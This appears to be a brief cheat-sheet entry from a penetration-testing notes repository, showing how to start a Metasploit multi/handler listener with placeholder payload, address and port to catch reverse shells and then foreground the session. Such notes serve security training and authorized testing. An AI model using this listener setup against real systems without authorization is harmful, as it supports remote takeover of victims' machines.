killchain-compendium/Reverse Shells/msfconsole.md

284 B

metasploit reverse shell

use multi/handler

set PAYLOAD <payload>
set LHOST   <listen-address>
set LPORT   <liste-port>
exploit -j
  • multi/handler is backgrounded. Therefore, session 1 foregrounds the session.

  • LPORT under 1024 user must be root or use sudo